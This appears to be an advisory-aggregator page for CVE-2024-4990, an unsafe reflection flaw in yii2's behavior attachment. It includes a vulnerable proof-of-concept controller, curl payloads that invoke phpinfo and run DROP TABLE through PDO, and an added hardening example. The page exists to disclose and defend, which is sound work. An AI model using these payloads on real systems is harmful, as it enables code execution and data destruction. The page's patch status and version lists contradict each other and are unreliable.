Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1jamNjLXA2N20tN3F4bc4AA8mV
Unsafe Reflection in base Component class in yiisoft/yii2
Yii2 supports attaching Behaviors to Components by setting properties having the format 'as <behaviour-name>'. Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check that verifies that $value is a valid Behavior class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.
Impact
With some effort, malicious code can be injected and executed; the effect could be anything from deleting files to dropping database tables.
Patches
Not yet patched.
Workarounds
No workaround available.
References
Reported here. In case the link is dead, here is the full description:
Description
Yii2 supports attaching Behaviors to Components by setting properties having the format 'as <behaviour-name>'. Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check that verifies that $value is a valid Behavior class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.
Depending on the installed dependencies, various kinds of attacks are possible.
Proof of Concept
A PoC application was created using composer create-project, as specified in the getting-started guide. The Yii JSON parser was enabled in the configuration:
'parsers' => [ 'application/json' => 'yii\web\JsonParser' ]
A vulnerable controller was added:
<?php
namespace app\controllers;

use yii\base\Component;
use yii\web\Controller;

class ExploitableController extends Controller
{
    public function beforeAction($action): bool
    {
        // Needed only to simplify the PoC
        $this->enableCsrfValidation = false;
        return parent::beforeAction($action);
    }

    public function actionVulnerable(): string
    {
        $fields = $this->request->post();
        $myComponent = new Component();
        foreach ($fields as $key => $value) {
            $myComponent->$key = $value;
        }
        return "";
    }
}
Executing phpinfo()
The following command stores the content of phpinfo() inside info.html:
curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"GuzzleHttp\\Psr7\\FnStream", "__construct()": [[]], "_fn_close": "phpinfo"}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable > info.html
It leverages the fact that the GuzzleHttp\Psr7\FnStream class executes call_user_func($this->_fn_close) inside __destruct(). This class is a default dependency.
Executing arbitrary MySQL queries (blind execution)
If the application is connected to a MySQL database, it is possible to exploit the PDO class to execute arbitrary SQL queries:
curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"\\PDO", "__construct()": ["mysql:host=127.0.0.1;dbname=test", "test", "test", {"1002": "DROP TABLE test"}]}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable
Notice that the server will always return a 500 Internal Server Error (because the instantiated class is not a Behavior); however, the query is executed, even though we can't receive any output from it. If the query fails we might see a PDO error message (e.g. "Table 'test.foo' doesn't exist"), depending on the app configuration.
Impact
It is not trivial to exploit this bug, because it depends on peculiar characteristics of the target application. However, it appears that there is at least one very popular product built on Yii2 that is severely affected by this vulnerability (allowing an anonymous user to gain admin access with an easy exploit).
The consequences of the exploitation could vary from retrieving sensitive information to DoS or unauthorized access.
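The controller in the proof of concept copies every request key onto a Component, which is what lets an 'as <name>' key reach __set() and Yii::createObject() with attacker-chosen content. The following is an added example, not code from the advisory or from the yii2 project, showing the two defensive checks a practitioner would want: a type check that refuses any behavior configuration whose class is not a Behavior subclass before anything is instantiated, and a controller that only copies allow-listed request fields onto a component with declared properties. It assumes a Yii 2 application on PHP 7.1+ (yii\base\Behavior, yii\base\Component, Yii::createObject() and yii\web\Controller::$request are available); BehaviorGuard, AuditBehavior, Settings and HardenedController are hypothetical names chosen for this example.

```php
<?php
// Added example, not code from the advisory or the yii2 project.
// Assumes a Yii 2 application (PHP 7.1+). All class names below except the
// yii\* ones are hypothetical and exist only for this example.

namespace app\components {

    use Yii;
    use yii\base\Behavior;
    use yii\base\Component;
    use yii\base\InvalidConfigException;

    final class BehaviorGuard
    {
        /**
         * Extract the class name from the shapes Yii::createObject() accepts:
         * a class-name string, or an array carrying '__class' or 'class'.
         * Returns null when no class name can be determined.
         */
        public static function className($value): ?string
        {
            if (is_string($value)) {
                return $value;
            }
            if (is_array($value)) {
                foreach (['__class', 'class'] as $key) {
                    if (isset($value[$key]) && is_string($value[$key])) {
                        return $value[$key];
                    }
                }
            }
            return null;
        }

        /**
         * Instantiate $value only if it is configured to be a Behavior (or a
         * subclass). The type check runs before Yii::createObject(), so no
         * constructor or setter of a foreign class is ever reached.
         */
        public static function create($value): Behavior
        {
            if ($value instanceof Behavior) {
                return $value;
            }
            $class = self::className($value);
            // is_a() with $allow_string = true autoloads the class and walks its hierarchy
            if ($class === null || !is_a($class, Behavior::class, true)) {
                throw new InvalidConfigException(
                    'Refusing to attach behavior: ' . var_export($class, true)
                    . ' is not a ' . Behavior::class
                );
            }
            return Yii::createObject($value);
        }
    }

    /** Stand-in for any real Behavior subclass the application ships. */
    final class AuditBehavior extends Behavior
    {
        public $channel = 'audit';
    }

    /** A component with an explicit, declared set of writable properties. */
    final class Settings extends Component
    {
        public $title = '';
        public $enabled = false;
    }
}

namespace app\controllers {

    use app\components\AuditBehavior;
    use app\components\BehaviorGuard;
    use app\components\Settings;
    use yii\web\BadRequestHttpException;
    use yii\web\Controller;

    final class HardenedController extends Controller
    {
        /** Request fields that may be copied onto the component; nothing else is. */
        private const ALLOWED_FIELDS = ['title', 'enabled'];

        public function actionSafe(): string
        {
            $fields = $this->request->post();
            $settings = new Settings();

            foreach ($fields as $key => $value) {
                // Reject unknown keys outright; this also excludes the
                // 'as <name>' and 'on <event>' magic property forms.
                if (!in_array($key, self::ALLOWED_FIELDS, true)) {
                    throw new BadRequestHttpException("Unexpected field '{$key}'");
                }
                $settings->$key = $value;
            }

            // Behaviors come from server-side configuration only, and even that
            // configuration is type-checked before it is instantiated.
            $settings->attachBehavior(
                'audit',
                BehaviorGuard::create(['class' => AuditBehavior::class, 'channel' => 'settings'])
            );
            return '';
        }
    }
}
```

The allow-list is the check that protects an application regardless of framework version: request keys are never interpreted as property names until they have been matched against a fixed set. BehaviorGuard::create() is the second, independent layer; given a configuration such as the PoC's {"__class": "\\PDO", ...}, it throws InvalidConfigException before PDO's constructor runs, whereas an unchecked Yii::createObject() call would instantiate it.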
Permalink: https://github.com/advisories/GHSA-cjcc-p67m-7qxm
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jamNjLXA2N20tN3F4bc4AA8mV
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 8 months ago
Updated: 6 months ago
CVSS Score: 8.1
CVSS vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-cjcc-p67m-7qxm, CVE-2024-4990
References:
- https://github.com/yiisoft/yii2/security/advisories/GHSA-cjcc-p67m-7qxm
- https://github.com/yiisoft/yii2/commit/628d406bfafb80fc32147837888c0057d89a021e
- https://github.com/yiisoft/yii2/blob/master/framework/CHANGELOG.md#2050-may-30-2024
- https://github.com/yiisoft/yii2/pull/20183
- https://github.com/yiisoft/yii2/commit/62d081f18c3602d09e7d075bba3a0ca5c313f0b4
- https://github.com/FriendsOfPHP/security-advisories/blob/master/yiisoft/yii2/CVE-2024-4990.yaml
- https://github.com/advisories/GHSA-cjcc-p67m-7qxm
Blast Radius: 36.7
Affected Packages
packagist:yiisoft/yii2
Dependent packages: 9,497
Dependent repositories: 33,911
Downloads: 24,169,492 total
Affected Version Ranges: < 2.0.49.4
Fixed in: 2.0.49.4
All affected versions: 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4-1.1, 2.0.4-2.1, 2.0.4-8.1, 2.0.4-9.1, 2.0.4-9.2, 2.0.4-9.3
All unaffected versions: 2.0.4, 2.0.5, 2.0.6, 2.0.7, 2.0.8, 2.0.9, 2.0.10, 2.0.11, 2.0.12, 2.0.13, 2.0.14, 2.0.15, 2.0.16, 2.0.17, 2.0.18, 2.0.19, 2.0.20, 2.0.21, 2.0.22, 2.0.23, 2.0.24, 2.0.25, 2.0.26, 2.0.27, 2.0.28, 2.0.29, 2.0.30, 2.0.31, 2.0.32, 2.0.33, 2.0.34, 2.0.35, 2.0.36, 2.0.37, 2.0.38, 2.0.39, 2.0.40, 2.0.41, 2.0.42, 2.0.43, 2.0.44, 2.0.45, 2.0.46, 2.0.47, 2.0.48, 2.0.49, 2.0.50, 2.0.51